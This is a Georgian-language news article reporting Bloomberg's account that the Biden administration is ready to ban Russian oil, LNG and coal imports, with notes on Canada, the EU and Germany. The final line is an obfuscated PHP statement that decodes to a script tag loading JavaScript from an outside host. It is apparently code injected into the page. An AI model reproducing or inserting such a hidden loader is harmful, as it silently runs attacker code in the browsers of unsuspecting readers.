celsiusi
ავერსი შნაიდერი
ბაიდენის ადმინისტრაცია მზადაა რუსეთიდან ენერგიის იმპორტი აკრძალოს. ამის შესახებ Bloomberg-ი საკუთარ წყაროებზე დაყრდნობით წერს.  
 
აკრძალვა მოიცავს რუსულ ნავთობს, თხევად ბუნებრივ აირს და ნახშირს.
 
წყარო ამბობს, რომ აშშ-მა გადაწყვეტილება მიიღო ევროპელ მოკავშირეებთან კონსულტაციის შედეგად.
 
თეთრი სახლი საკითხზე ოფიციალურ კომენტარს ჯერჯერობით არ აკეთებს. 
 
რუსული ნედლი ნავთობის აკრძალვის შესახებ განაცხადა კანადამაც. 
 
რაც შეეხება ევროკავშირს, რომელიც აშშ-სთან შედარებით, უფრო მეტად არის რუსულ ენერგიაზე დამოკიდებული, რუსული ნავთობის იმპორტის შესაძლო აკრძალვის შესახებ ევროკავშირის მთავრობების აზრი ორად იყოფა.  
 
გუშინ გერმანიის კანცლერმა ოლაფ შოლცმა უახლოეს მომავალში რუსეთიდან ნავთობისა და გაზის იმპორტის აკრძალვა გამორიცხა და თქვა, რომ მას ევროპის ეკონომიკისთვის "არსებითი მნიშვნელობა" აქვს. 
 
აშშ-ის ენერგეტიკული ინფორმაციის ადმინისტრაციის მონაცემებით, რუსულმა ნავთობმა გასულ წელს ქვეყანაში შესული ნედლი ნავთობის დაახლოებით 3% შეადგინა. მთლიანობაში, რუსულ ნავთობსა და ნავთობპროდუქტების იმპორტზე აშშ-ის მთლიანი რაოდენობის დაახლოებით 8% მოდის. 
 
Bloomberg-ის ორიგინალური სტატიის ავტორები: ანმარი ჰორდენი, ჯენიფერ ჯეიკობსი და სალეჰა მოჰსინი
805
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");